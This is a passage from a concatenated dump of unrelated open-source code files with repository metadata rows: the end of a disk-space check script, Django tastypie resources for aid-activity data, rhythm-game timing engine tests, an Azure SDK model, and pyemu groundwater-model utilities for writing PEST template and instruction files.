outputINODE+=tag+" InodeWARN "+format(value['iused_percent'],'.2f')+" "
warn=1
perfdata+=tag+"="+str(value['used']/1024)+"KB;"+str(new_warning[i]*1024)+";"+str(new_critical[i]*1024)+";0;"+str(value['total']/1024)+"; "
#output+=tag+"="+GetHumanReadable(value['used'])+" "
i+=1
if crit==1:
print "DISK CRITICAL Free Space "+outputCRIT+" "+outputINODE+"| "+perfdata
sys.exit(2)
elif warn==1:
print "DISK WARNING Free Space "+outputWARN+" "+outputINODE+"| "+perfdata
sys.exit(1)
else:
print "DISK OK Free Space "+outputOK+"| "+perfdata
sys.exit(0)
if __name__ == '__main__':
main()
| gpl-3.0 | -220,261,891,489,609,950 | 37.736842 | 170 | 0.56019 | false |
tokatikato/OIPA | OIPA/api/v3/resources/activity_view_resources.py | 1 | 12434 | # Tastypie specific
from tastypie import fields
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from tastypie.resources import ModelResource
# Data specific
from api.cache import NoTransformCache
from iati.models import ContactInfo, Activity, Organisation, AidType, FlowType, Sector, CollaborationType, \
TiedStatus, Transaction, ActivityStatus, Currency, OrganisationRole, ActivityScope, \
ActivityParticipatingOrganisation, Location, Result
from api.v3.resources.helper_resources import TitleResource, DescriptionResource, FinanceTypeResource, \
ActivityBudgetResource, DocumentResource, WebsiteResource, PolicyMarkerResource, OtherIdentifierResource
from api.v3.resources.advanced_resources import OnlyCountryResource, OnlyRegionResource
# cache specific
from django.http import HttpResponse
from cache.validator import Validator
from api.v3.resources.csv_serializer import CsvSerializer
from api.api_tools import comma_separated_parameter_to_list
from api.paginator import NoCountPaginator
class ActivityViewAidTypeResource(ModelResource):
class Meta:
queryset = AidType.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewFlowTypeResource(ModelResource):
class Meta:
queryset = FlowType.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewSectorResource(ModelResource):
class Meta:
queryset = Sector.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewCollaborationTypeResource(ModelResource):
class Meta:
queryset = CollaborationType.objects.all()
include_resource_uri = False
excludes = ['description', 'language']
class ActivityViewTiedStatusResource(ModelResource):
class Meta:
queryset = TiedStatus.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewOrganisationRoleResource(ModelResource):
class Meta:
queryset = OrganisationRole.objects.all()
include_resource_uri = False
class ActivityViewOrganisationResource(ModelResource):
organisation_role = fields.ForeignKey(ActivityViewOrganisationRoleResource, 'organisation_role', full=True, null=True)
class Meta:
queryset = Organisation.objects.all()
include_resource_uri = False
excludes = ['abbreviation', 'reported_by_organisation']
filtering = {
'iati_identifier': 'exact',
'code': ALL_WITH_RELATIONS
}
class ActivityViewTransactionResource(ModelResource):
provider_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'provider_organisation', full=True, null=True)
receiver_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'receiver_organisation', full=True, null=True)
class Meta:
queryset = Transaction.objects.all()
include_resource_uri = False
excludes = ['id', 'ref', 'description', 'provider_activity']
allowed_methods = ['get']
def dehydrate(self, bundle):
bundle.data['disbursement_channel'] = bundle.obj.disbursement_channel_id
bundle.data['currency'] = bundle.obj.currency_id
bundle.data['tied_status'] = bundle.obj.tied_status_id
bundle.data['transaction_type'] = bundle.obj.transaction_type_id
return bundle
class ActivityViewParticipatingOrganisationResource(ModelResource):
organisation = fields.ToOneField(ActivityViewOrganisationResource, 'organisation', full=True, null=True)
class Meta:
queryset = ActivityParticipatingOrganisation.objects.all()
include_resource_uri = False
excludes = ['id']
filtering = {
'organisation': ALL_WITH_RELATIONS
}
def dehydrate(self, bundle):
bundle.data['role_id'] = bundle.obj.role_id
bundle.data['code'] = bundle.obj.organisation_id
return bundle
class ActivityViewActivityStatusResource(ModelResource):
class Meta:
queryset = ActivityStatus.objects.all()
include_resource_uri = False
excludes = ['language']
class ActivityViewActivityScopeResource(ModelResource):
class Meta:
queryset = ActivityScope.objects.all()
include_resource_uri = False
class ActivityViewCurrencyResource(ModelResource):
class Meta:
queryset = Currency.objects.all()
include_resource_uri = False
excludes = ['language']
class ActivityViewContactInfoResource(ModelResource):
class Meta:
queryset = ContactInfo.objects.all()
include_resource_uri = False
excludes = ['id']
class ActivityLocationResource(ModelResource):
class Meta:
queryset = Location.objects.all()
include_resource_uri = False
excludes = ['id', 'activity_description', 'adm_code', 'adm_country_adm1', 'adm_country_adm2',
'adm_country_name', 'adm_level', 'gazetteer_entry', 'location_id_code', 'point_srs_name',
'ref', 'type_description', 'point_pos']
class ActivityResultResource(ModelResource):
class Meta:
queryset = Result.objects.all()
include_resource_uri = False
excludes = ['id']
class ActivityResource(ModelResource):
countries = fields.ToManyField(OnlyCountryResource, 'recipient_country', full=True, null=True, use_in='all')
regions = fields.ToManyField(OnlyRegionResource, 'recipient_region', full=True, null=True, use_in='all')
sectors = fields.ToManyField(ActivityViewSectorResource, 'sector', full=True, null=True, use_in='all')
titles = fields.ToManyField(TitleResource, 'title_set', full=True, null=True, use_in='all')
descriptions = fields.ToManyField(DescriptionResource, 'description_set', full=True, null=True, use_in='all')
participating_organisations = fields.ToManyField(ActivityViewOrganisationResource, 'participating_organisation', full=True, null=True, use_in='all')
reporting_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'reporting_organisation', full=True, null=True, use_in='detail' )
activity_status = fields.ForeignKey(ActivityViewActivityStatusResource, 'activity_status', full=True, null=True, use_in='detail')
websites = fields.ToManyField(WebsiteResource, 'activity_website_set', full=True, null=True, use_in='detail')
policy_markers = fields.ToManyField(PolicyMarkerResource, 'policy_marker', full=True, null=True, use_in='detail')
collaboration_type = fields.ForeignKey(ActivityViewCollaborationTypeResource, attribute='collaboration_type', full=True, null=True, use_in='detail')
default_flow_type = fields.ForeignKey(ActivityViewFlowTypeResource, attribute='default_flow_type', full=True, null=True, use_in='detail')
default_finance_type = fields.ForeignKey(FinanceTypeResource, attribute='default_finance_type', full=True, null=True, use_in='detail')
default_aid_type = fields.ForeignKey(ActivityViewAidTypeResource, attribute='default_aid_type', full=True, null=True, use_in='detail')
default_tied_status = fields.ForeignKey(ActivityViewTiedStatusResource, attribute='default_tied_status', full=True, null=True, use_in='detail')
activity_scope = fields.ForeignKey(ActivityViewActivityScopeResource, attribute='scope', full=True, null=True, use_in='detail')
default_currency = fields.ForeignKey(ActivityViewCurrencyResource, attribute='default_currency', full=True, null=True, use_in='detail')
budget = fields.ToManyField(ActivityBudgetResource, 'budget_set', full=True, null=True, use_in='detail')
transactions = fields.ToManyField(ActivityViewTransactionResource, 'transaction_set', full=True, null=True, use_in='detail')
documents = fields.ToManyField(DocumentResource, 'documentlink_set', full=True, null=True, use_in='detail')
other_identifier = fields.ToManyField(OtherIdentifierResource, 'otheridentifier_set', full=True, null=True, use_in='detail')
locations = fields.ToManyField(ActivityLocationResource, 'location_set', full=True, null=True, use_in='all')
results = fields.ToManyField(ActivityResultResource, 'result_set', full=True, null=True, use_in='detail')
# to add:
# conditions
# contact
# country-budget?
# crsadd
# disbursement channel?
# ffs
# ffs forecast?
# planned disbursement
# related activity
# verification status
# vocabulary?
class Meta:
queryset = Activity.objects.all()
resource_name = 'activities'
max_limit = 1000
serializer = CsvSerializer()
excludes = ['date_created']
ordering = ['start_actual', 'start_planned', 'end_actual', 'end_planned', 'sectors', 'total_budget']
filtering = {
'iati_identifier': 'exact',
'start_planned': ALL,
'start_actual': ALL,
'end_planned': ALL,
'end_actual': ALL,
'total_budget': ALL,
'sectors': ('exact', 'in'),
'regions': ('exact', 'in'),
'countries': ('exact', 'in'),
'reporting_organisation': ('exact', 'in'),
'documents': ALL_WITH_RELATIONS
}
cache = NoTransformCache()
paginator_class = NoCountPaginator
def apply_filters(self, request, applicable_filters):
activity_list = super(ActivityResource, self).apply_filters(request, applicable_filters).prefetch_related('title_set').prefetch_related('description_set')
query = request.GET.get('query', None)
filter_year_param = request.GET.get('start_year_planned__in', None)
if query:
search_fields = comma_separated_parameter_to_list(request.GET.get('search_fields', None))
activity_list = activity_list.search(query, search_fields)
if filter_year_param:
years = comma_separated_parameter_to_list(filter_year_param)
activity_list = activity_list.filter_years(years)
return activity_list.distinct_if_necessary(applicable_filters)
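    # Example query string handled by apply_filters above (the parameter values are
    # hypothetical; the parameter names come from the code):
    #   ?query=water&search_fields=title,description&start_year_planned__in=2012,2013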
def full_dehydrate(self, bundle, for_list=False):
#If the select_fields param is found, run this overwritten method.
#Otherwise run the default Tastypie method
select_fields_param = bundle.request.GET.get('select_fields', None)
if select_fields_param:
select_fields = comma_separated_parameter_to_list(select_fields_param)
for field_name, field_object in self.fields.items():
#If the field_name is in the list of requested fields dehydrate it
if (field_name) in select_fields:
# A touch leaky but it makes URI resolution work.
if getattr(field_object, 'dehydrated_type', None) == 'related':
field_object.api_name = self._meta.api_name
field_object.resource_name = self._meta.resource_name
bundle.data[field_name] = field_object.dehydrate(bundle, for_list=for_list)
# Check for an optional method to do further dehydration.
method = getattr(self, "dehydrate_%s" % field_name, None)
if method:
bundle.data[field_name] = method(bundle)
bundle = self.dehydrate(bundle)
return bundle
else:
return super(ActivityResource, self).full_dehydrate(bundle, for_list)
def get_list(self, request, **kwargs):
# check if call is cached using validator.is_cached
# check if call contains flush, if it does the call comes from the cache updater and shouldn't return cached results
validator = Validator()
cururl = request.META['PATH_INFO'] + "?" + request.META['QUERY_STRING']
if not 'flush' in cururl and validator.is_cached(cururl):
return HttpResponse(validator.get_cached_call(cururl), mimetype='application/json')
else:
return super(ActivityResource, self).get_list(request, **kwargs)
def alter_list_data_to_serialize(self, request, data):
select_fields_param = request.GET.get('select_fields', None)
if select_fields_param:
select_fields = comma_separated_parameter_to_list(select_fields_param)
data['meta']['selectable_fields'] = {f[0] for f in self.fields.items()} - {f for f in select_fields}
return data
| agpl-3.0 | 9,049,514,736,130,169,000 | 43.24911 | 162 | 0.687309 | false |
garcia/simfile | simfile/timing/tests/test_engine.py | 1 | 10046 | from decimal import Decimal
import unittest
from .helpers import *
from .. import *
from ..engine import *
class TestTimingEngine(unittest.TestCase):
def test_init(self):
timing_data = testing_timing_data()
engine = TimingEngine(timing_data)
self.assertEqual(timing_data, engine.timing_data)
def test_bpm_at(self):
timing_data = testing_timing_data()
engine = TimingEngine(timing_data)
self.assertEqual(Decimal('120.000'), engine.bpm_at(Beat(-10000)))
self.assertEqual(Decimal('120.000'), engine.bpm_at(Beat(0)))
self.assertEqual(Decimal('120.000'), engine.bpm_at(Beat(1) - Beat.tick()))
self.assertEqual(Decimal('150.000'), engine.bpm_at(Beat(1)))
self.assertEqual(Decimal('150.000'), engine.bpm_at(Beat(2) - Beat.tick()))
self.assertEqual(Decimal('200.000'), engine.bpm_at(Beat(2)))
self.assertEqual(Decimal('200.000'), engine.bpm_at(Beat(3) - Beat.tick()))
self.assertEqual(Decimal('300.000'), engine.bpm_at(Beat(3)))
self.assertEqual(Decimal('300.000'), engine.bpm_at(Beat(10000)))
def test_time_at(self):
timing_data = testing_timing_data()
engine = TimingEngine(timing_data)
self.assertAlmostEqual(-0.491, engine.time_at(Beat(-1)))
self.assertAlmostEqual(0.009, engine.time_at(Beat(0)))
self.assertAlmostEqual(0.259, engine.time_at(Beat(0.5)))
self.assertAlmostEqual(0.509, engine.time_at(Beat(1)))
self.assertAlmostEqual(0.709, engine.time_at(Beat(1.5)))
self.assertAlmostEqual(0.909, engine.time_at(Beat(2)))
self.assertAlmostEqual(1.059, engine.time_at(Beat(2.5)))
self.assertAlmostEqual(1.565, engine.time_at(Beat(2.5) + Beat.tick()), places=3)
self.assertAlmostEqual(1.709, engine.time_at(Beat(3)))
self.assertAlmostEqual(1.813, engine.time_at(Beat(3) + Beat.tick()), places=3)
self.assertAlmostEqual(2.009, engine.time_at(Beat(4)))
self.assertAlmostEqual(201.209, engine.time_at(Beat(1000)))
def test_beat_at(self):
timing_data = testing_timing_data()
engine = TimingEngine(timing_data)
self.assertEqual(Beat(-1), engine.beat_at(-0.491))
self.assertEqual(Beat(0), engine.beat_at(0.009))
self.assertEqual(Beat(0.5), engine.beat_at(0.259))
self.assertEqual(Beat(1), engine.beat_at(0.509))
self.assertEqual(Beat(1.5), engine.beat_at(0.709))
self.assertEqual(Beat(2), engine.beat_at(0.909))
self.assertEqual(Beat(2.5), engine.beat_at(1.059))
self.assertEqual(Beat(2.5), engine.beat_at(1.559))
self.assertEqual(Beat(2.5) + Beat.tick(), engine.beat_at(1.566))
self.assertEqual(Beat(3), engine.beat_at(1.709))
self.assertEqual(Beat(3), engine.beat_at(1.809))
self.assertEqual(Beat(3) + Beat.tick(), engine.beat_at(1.814))
self.assertEqual(Beat(4), engine.beat_at(2.009))
self.assertEqual(Beat(1000), engine.beat_at(201.209))
def test_time_at_with_delays_and_warps(self):
timing_data = testing_timing_data_with_delays_and_warps()
engine = TimingEngine(timing_data)
self.assertEqual(0, engine.time_at(Beat(0)))
self.assertEqual(0.5, engine.time_at(Beat(1), EventTag.DELAY))
self.assertEqual(0.75, engine.time_at(Beat(1), EventTag.STOP))
self.assertEqual(1.25, engine.time_at(Beat(2)))
self.assertEqual(1.25, engine.time_at(Beat(2.5)))
self.assertEqual(1.5, engine.time_at(Beat(3), EventTag.DELAY))
self.assertEqual(2.0, engine.time_at(Beat(3), EventTag.STOP))
self.assertEqual(2.25, engine.time_at(Beat(3), EventTag.STOP_END))
self.assertEqual(2.75, engine.time_at(Beat(4), EventTag.STOP))
self.assertEqual(3.0, engine.time_at(Beat(4), EventTag.STOP_END))
self.assertEqual(3.0, engine.time_at(Beat(4.5)))
self.assertEqual(3.25, engine.time_at(Beat(5)))
self.assertEqual(3.25, engine.time_at(Beat(5.25), EventTag.STOP))
self.assertEqual(3.5, engine.time_at(Beat(5.25), EventTag.STOP_END))
self.assertEqual(3.5, engine.time_at(Beat(5.5)))
self.assertEqual(3.75, engine.time_at(Beat(6)))
self.assertEqual(3.75, engine.time_at(Beat(6.5), EventTag.STOP))
self.assertEqual(4.0, engine.time_at(Beat(6.5), EventTag.STOP_END))
self.assertEqual(4.25, engine.time_at(Beat(7), EventTag.DELAY))
self.assertEqual(4.5, engine.time_at(Beat(7), EventTag.DELAY_END))
self.assertEqual(4.5, engine.time_at(Beat(7.5)))
self.assertEqual(4.75, engine.time_at(Beat(8)))
self.assertEqual(4.75, engine.time_at(Beat(8.25), EventTag.DELAY))
self.assertEqual(5.0, engine.time_at(Beat(8.25), EventTag.DELAY_END))
self.assertEqual(5.0, engine.time_at(Beat(8.5)))
self.assertEqual(5.25, engine.time_at(Beat(9)))
self.assertEqual(5.25, engine.time_at(Beat(9.5), EventTag.DELAY))
self.assertEqual(5.5, engine.time_at(Beat(9.5), EventTag.DELAY_END))
self.assertEqual(5.75, engine.time_at(Beat(10)))
self.assertEqual(5.75, engine.time_at(Beat(10.25)))
self.assertEqual(5.75, engine.time_at(Beat(10.5)))
self.assertEqual(5.75, engine.time_at(Beat(10.75)))
self.assertEqual(5.875, engine.time_at(Beat(11)))
self.assertEqual(5.875, engine.time_at(Beat(11.25)))
self.assertEqual(5.875, engine.time_at(Beat(11.5)))
self.assertEqual(5.875, engine.time_at(Beat(11.75)))
self.assertEqual(6.0, engine.time_at(Beat(12)))
self.assertEqual(6.0, engine.time_at(Beat(12.25)))
self.assertEqual(6.0, engine.time_at(Beat(12.5)))
self.assertEqual(6.0, engine.time_at(Beat(12.75)))
self.assertEqual(6.125, engine.time_at(Beat(13)))
def test_beat_at_with_delays_and_warps(self):
timing_data = testing_timing_data_with_delays_and_warps()
engine = TimingEngine(timing_data)
self.assertEqual(Beat(0), engine.beat_at(0))
self.assertEqual(Beat(1), engine.beat_at(0.5))
self.assertEqual(Beat(1), engine.beat_at(0.75))
self.assertEqual(Beat(2.5), engine.beat_at(1.25))
self.assertEqual(Beat(3), engine.beat_at(1.5))
self.assertEqual(Beat(3), engine.beat_at(2.0))
self.assertEqual(Beat(3), engine.beat_at(2.25))
self.assertEqual(Beat(4), engine.beat_at(2.75))
self.assertEqual(Beat(4), engine.beat_at(3.0, EventTag.WARP))
self.assertEqual(Beat(4.5), engine.beat_at(3.0))
self.assertEqual(Beat(5), engine.beat_at(3.25, EventTag.WARP))
self.assertEqual(Beat(5.25), engine.beat_at(3.25))
self.assertEqual(Beat(5.25), engine.beat_at(3.5, EventTag.WARP))
self.assertEqual(Beat(5.5), engine.beat_at(3.5))
self.assertEqual(Beat(6.0), engine.beat_at(3.75, EventTag.WARP))
self.assertEqual(Beat(6.5), engine.beat_at(3.75))
self.assertEqual(Beat(6.5), engine.beat_at(4.0))
self.assertEqual(Beat(7), engine.beat_at(4.25))
self.assertEqual(Beat(7), engine.beat_at(4.5, EventTag.WARP))
self.assertEqual(Beat(7.5), engine.beat_at(4.5))
self.assertEqual(Beat(8), engine.beat_at(4.75, EventTag.WARP))
self.assertEqual(Beat(8.25), engine.beat_at(4.75))
self.assertEqual(Beat(8.5), engine.beat_at(5.0))
self.assertEqual(Beat(9), engine.beat_at(5.25, EventTag.WARP))
self.assertEqual(Beat(9.5), engine.beat_at(5.25))
self.assertEqual(Beat(9.5), engine.beat_at(5.5))
self.assertEqual(Beat(10.0), engine.beat_at(5.75, EventTag.WARP))
self.assertEqual(Beat(10.75), engine.beat_at(5.75))
self.assertEqual(Beat(11.0), engine.beat_at(5.875, EventTag.WARP))
self.assertEqual(Beat(11.75), engine.beat_at(5.875))
self.assertEqual(Beat(12.0), engine.beat_at(6.0, EventTag.WARP))
self.assertEqual(Beat(12.75), engine.beat_at(6.0))
def test_hittable(self):
timing_data = testing_timing_data_with_delays_and_warps()
engine = TimingEngine(timing_data)
self.assertTrue(engine.hittable(Beat(0)))
self.assertTrue(engine.hittable(Beat(1)))
self.assertFalse(engine.hittable(Beat(2)))
self.assertFalse(engine.hittable(Beat(2.25)))
self.assertTrue(engine.hittable(Beat(2.5)))
self.assertTrue(engine.hittable(Beat(3)))
self.assertTrue(engine.hittable(Beat(4)))
self.assertFalse(engine.hittable(Beat(4.25)))
self.assertTrue(engine.hittable(Beat(4.5)))
self.assertFalse(engine.hittable(Beat(5)))
self.assertTrue(engine.hittable(Beat(5.25)))
self.assertTrue(engine.hittable(Beat(5.5)))
self.assertFalse(engine.hittable(Beat(6)))
self.assertFalse(engine.hittable(Beat(6.25)))
self.assertTrue(engine.hittable(Beat(6.5)))
self.assertTrue(engine.hittable(Beat(7)))
self.assertFalse(engine.hittable(Beat(7.25)))
self.assertTrue(engine.hittable(Beat(7.5)))
self.assertFalse(engine.hittable(Beat(8)))
self.assertTrue(engine.hittable(Beat(8.25)))
self.assertTrue(engine.hittable(Beat(8.5)))
self.assertFalse(engine.hittable(Beat(9)))
self.assertFalse(engine.hittable(Beat(9.25)))
self.assertTrue(engine.hittable(Beat(9.5)))
self.assertFalse(engine.hittable(Beat(10)))
self.assertFalse(engine.hittable(Beat(10.25)))
self.assertFalse(engine.hittable(Beat(10.5)))
self.assertTrue(engine.hittable(Beat(10.75)))
self.assertFalse(engine.hittable(Beat(11)))
self.assertFalse(engine.hittable(Beat(11.25)))
self.assertFalse(engine.hittable(Beat(11.5)))
self.assertTrue(engine.hittable(Beat(11.75)))
self.assertFalse(engine.hittable(Beat(12)))
self.assertFalse(engine.hittable(Beat(12.25)))
self.assertFalse(engine.hittable(Beat(12.5)))
self.assertTrue(engine.hittable(Beat(12.75)))
self.assertTrue(engine.hittable(Beat(13))) | mit | -8,069,988,434,666,341,000 | 53.308108 | 88 | 0.646825 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/virtual_machine_scale_set_instance_view_statuses_summary.py | 1 | 1313 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VirtualMachineScaleSetInstanceViewStatusesSummary(Model):
"""Instance view statuses summary for virtual machines of a virtual machine
scale set.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar statuses_summary: The extensions information.
:vartype statuses_summary:
list[~azure.mgmt.compute.v2016_03_30.models.VirtualMachineStatusCodeCount]
"""
_validation = {
'statuses_summary': {'readonly': True},
}
_attribute_map = {
'statuses_summary': {'key': 'statusesSummary', 'type': '[VirtualMachineStatusCodeCount]'},
}
def __init__(self, **kwargs):
super(VirtualMachineScaleSetInstanceViewStatusesSummary, self).__init__(**kwargs)
self.statuses_summary = None
| mit | -2,771,557,624,166,246,400 | 34.486486 | 98 | 0.633663 | false |
jtwhite79/pyemu | pyemu/utils/gw_utils.py | 1 | 110032 | """MODFLOW support utilities"""
import os
from datetime import datetime
import shutil
import warnings
import numpy as np
import pandas as pd
import re
pd.options.display.max_colwidth = 100
from pyemu.pst.pst_utils import (
SFMT,
IFMT,
FFMT,
pst_config,
parse_tpl_file,
try_process_output_file,
)
from pyemu.utils.os_utils import run
from pyemu.utils.helpers import _write_df_tpl
from ..pyemu_warnings import PyemuWarning
PP_FMT = {
"name": SFMT,
"x": FFMT,
"y": FFMT,
"zone": IFMT,
"tpl": SFMT,
"parval1": FFMT,
}
PP_NAMES = ["name", "x", "y", "zone", "parval1"]
def modflow_pval_to_template_file(pval_file, tpl_file=None):
"""write a template file for a modflow parameter value file.
Args:
pval_file (`str`): the path and name of the existing modflow pval file
tpl_file (`str`, optional): template file to write. If None, use
`pval_file` +".tpl". Default is None
Note:
Uses names in the first column in the pval file as par names.
Returns:
**pandas.DataFrame**: a dataFrame with control file parameter information
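
    Example (the pval file name is a placeholder)::

        df = pyemu.gw_utils.modflow_pval_to_template_file("my.pval")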
"""
if tpl_file is None:
tpl_file = pval_file + ".tpl"
pval_df = pd.read_csv(
pval_file,
delim_whitespace=True,
header=None,
skiprows=2,
names=["parnme", "parval1"],
)
pval_df.index = pval_df.parnme
pval_df.loc[:, "tpl"] = pval_df.parnme.apply(lambda x: " ~ {0:15s} ~".format(x))
with open(tpl_file, "w") as f:
f.write("ptf ~\n#pval template file from pyemu\n")
f.write("{0:10d} #NP\n".format(pval_df.shape[0]))
f.write(
pval_df.loc[:, ["parnme", "tpl"]].to_string(
col_space=0,
formatters=[SFMT, SFMT],
index=False,
header=False,
justify="left",
)
)
return pval_df
def modflow_hob_to_instruction_file(hob_file, ins_file=None):
"""write an instruction file for a modflow head observation file
Args:
hob_file (`str`): the path and name of the existing modflow hob file
ins_file (`str`, optional): the name of the instruction file to write.
If `None`, `hob_file` +".ins" is used. Default is `None`.
Returns:
**pandas.DataFrame**: a dataFrame with control file observation information
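    Example:
        A minimal usage sketch; the hob output file name is a hypothetical placeholder::

            import pyemu
            df = pyemu.gw_utils.modflow_hob_to_instruction_file("model.hob.out")
            # "model.hob.out.ins" is written for the control file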
"""
hob_df = pd.read_csv(
hob_file,
delim_whitespace=True,
skiprows=1,
header=None,
names=["simval", "obsval", "obsnme"],
)
hob_df.loc[:, "obsnme"] = hob_df.obsnme.apply(str.lower)
hob_df.loc[:, "ins_line"] = hob_df.obsnme.apply(lambda x: "l1 !{0:s}!".format(x))
hob_df.loc[0, "ins_line"] = hob_df.loc[0, "ins_line"].replace("l1", "l2")
if ins_file is None:
ins_file = hob_file + ".ins"
f_ins = open(ins_file, "w")
f_ins.write("pif ~\n")
f_ins.write(
hob_df.loc[:, ["ins_line"]].to_string(
col_space=0,
columns=["ins_line"],
header=False,
index=False,
formatters=[SFMT],
)
+ "\n"
)
hob_df.loc[:, "weight"] = 1.0
hob_df.loc[:, "obgnme"] = "obgnme"
f_ins.close()
return hob_df
def modflow_hydmod_to_instruction_file(hydmod_file, ins_file=None):
"""write an instruction file for a modflow hydmod file
Args:
hydmod_file (`str`): the path and name of the existing modflow hob file
ins_file (`str`, optional): the name of the instruction file to write.
If `None`, `hydmod_file` +".ins" is used. Default is `None`.
Returns:
**pandas.DataFrame**: a dataFrame with control file observation information
Note:
calls `pyemu.gw_utils.modflow_read_hydmod_file()`
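    Example:
        A minimal usage sketch; the hydmod binary file name is a hypothetical placeholder::

            import pyemu
            df = pyemu.gw_utils.modflow_hydmod_to_instruction_file("model.hyd.bin")
            # "model.hyd.bin.dat" and "model.hyd.bin.dat.ins" are written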
"""
hydmod_df, hydmod_outfile = modflow_read_hydmod_file(hydmod_file)
hydmod_df.loc[:, "ins_line"] = hydmod_df.obsnme.apply(
lambda x: "l1 w !{0:s}!".format(x)
)
if ins_file is None:
ins_file = hydmod_outfile + ".ins"
with open(ins_file, "w") as f_ins:
f_ins.write("pif ~\nl1\n")
f_ins.write(
hydmod_df.loc[:, ["ins_line"]].to_string(
col_space=0,
columns=["ins_line"],
header=False,
index=False,
formatters=[SFMT],
)
+ "\n"
)
hydmod_df.loc[:, "weight"] = 1.0
hydmod_df.loc[:, "obgnme"] = "obgnme"
df = try_process_output_file(hydmod_outfile + ".ins")
if df is not None:
df.loc[:, "obsnme"] = df.index.values
df.loc[:, "obgnme"] = df.obsnme.apply(lambda x: x[:-9])
df.to_csv("_setup_" + os.path.split(hydmod_outfile)[-1] + ".csv", index=False)
return df
return hydmod_df
def modflow_read_hydmod_file(hydmod_file, hydmod_outfile=None):
"""read a binary hydmod file and return a dataframe of the results
Args:
hydmod_file (`str`): The path and name of the existing modflow hydmod binary file
hydmod_outfile (`str`, optional): output file to write. If `None`, use `hydmod_file` +".dat".
Default is `None`.
Returns:
        **pandas.DataFrame**: a dataFrame with hydmod_file values
"""
try:
import flopy.utils as fu
except Exception as e:
print("flopy is not installed - cannot read {0}\n{1}".format(hydmod_file, e))
return
obs = fu.HydmodObs(hydmod_file)
hyd_df = obs.get_dataframe()
hyd_df.columns = [i[2:] if i.lower() != "totim" else i for i in hyd_df.columns]
# hyd_df.loc[:,"datetime"] = hyd_df.index
hyd_df["totim"] = hyd_df.index.map(lambda x: x.strftime("%Y%m%d"))
hyd_df.rename(columns={"totim": "datestamp"}, inplace=True)
# reshape into a single column
hyd_df = pd.melt(hyd_df, id_vars="datestamp")
hyd_df.rename(columns={"value": "obsval"}, inplace=True)
hyd_df["obsnme"] = [
i.lower() + "_" + j.lower() for i, j in zip(hyd_df.variable, hyd_df.datestamp)
]
vc = hyd_df.obsnme.value_counts().sort_values()
vc = list(vc.loc[vc > 1].index.values)
if len(vc) > 0:
hyd_df.to_csv("hyd_df.duplciates.csv")
obs.get_dataframe().to_csv("hyd_org.duplicates.csv")
raise Exception("duplicates in obsnme:{0}".format(vc))
# assert hyd_df.obsnme.value_counts().max() == 1,"duplicates in obsnme"
if not hydmod_outfile:
hydmod_outfile = hydmod_file + ".dat"
hyd_df.to_csv(hydmod_outfile, columns=["obsnme", "obsval"], sep=" ", index=False)
# hyd_df = hyd_df[['obsnme','obsval']]
return hyd_df[["obsnme", "obsval"]], hydmod_outfile
def setup_mtlist_budget_obs(
list_filename,
gw_filename="mtlist_gw.dat",
sw_filename="mtlist_sw.dat",
start_datetime="1-1-1970",
gw_prefix="gw",
sw_prefix="sw",
save_setup_file=False,
):
"""setup observations of gw (and optionally sw) mass budgets from mt3dusgs list file.
Args:
list_filename (`str`): path and name of existing modflow list file
gw_filename (`str`, optional): output filename that will contain the gw budget
observations. Default is "mtlist_gw.dat"
sw_filename (`str`, optional): output filename that will contain the sw budget
observations. Default is "mtlist_sw.dat"
start_datetime (`str`, optional): an str that can be parsed into a `pandas.TimeStamp`.
used to give budget observations meaningful names. Default is "1-1-1970".
gw_prefix (`str`, optional): a prefix to add to the GW budget observations.
Useful if processing more than one list file as part of the forward run process.
Default is 'gw'.
sw_prefix (`str`, optional): a prefix to add to the SW budget observations. Useful
if processing more than one list file as part of the forward run process.
Default is 'sw'.
save_setup_file (`bool`, optional): a flag to save "_setup_"+ `list_filename` +".csv" file
that contains useful control file information. Default is `False`.
Returns:
tuple containing
- **str**: the command to add to the forward run script
- **str**: the names of the instruction files that were created
- **pandas.DataFrame**: a dataframe with information for constructing a control file
Note:
writes an instruction file and also a _setup_.csv to use when constructing a pest
control file
The instruction files are named `out_filename` +".ins"
It is recommended to use the default value for `gw_filename` or `sw_filename`.
This is the companion function of `gw_utils.apply_mtlist_budget_obs()`.
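    Example:
        A minimal setup sketch; the MT3D-USGS list file name is a placeholder::

            import pyemu
            frun_line, ins_files, df = pyemu.gw_utils.setup_mtlist_budget_obs(
                "mt3d.list", start_datetime="1-1-1970")
            # frun_line is then added to the forward run script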
"""
gw, sw = apply_mtlist_budget_obs(
list_filename, gw_filename, sw_filename, start_datetime
)
gw_ins = gw_filename + ".ins"
_write_mtlist_ins(gw_ins, gw, gw_prefix)
ins_files = [gw_ins]
df_gw = try_process_output_file(gw_ins, gw_filename)
if df_gw is None:
raise Exception("error processing groundwater instruction file")
if sw is not None:
sw_ins = sw_filename + ".ins"
_write_mtlist_ins(sw_ins, sw, sw_prefix)
ins_files.append(sw_ins)
df_sw = try_process_output_file(sw_ins, sw_filename)
if df_sw is None:
raise Exception("error processing surface water instruction file")
df_gw = df_gw.append(df_sw)
df_gw.loc[:, "obsnme"] = df_gw.index.values
if save_setup_file:
df_gw.to_csv("_setup_" + os.path.split(list_filename)[-1] + ".csv", index=False)
frun_line = "pyemu.gw_utils.apply_mtlist_budget_obs('{0}')".format(list_filename)
return frun_line, ins_files, df_gw
def _write_mtlist_ins(ins_filename, df, prefix):
"""write an instruction file for a MT3D-USGS list file"""
try:
dt_str = df.index.map(lambda x: x.strftime("%Y%m%d"))
except:
dt_str = df.index.map(lambda x: "{0:08.1f}".format(x).strip())
with open(ins_filename, "w") as f:
f.write("pif ~\nl1\n")
for dt in dt_str:
f.write("l1 ")
for col in df.columns.str.translate(
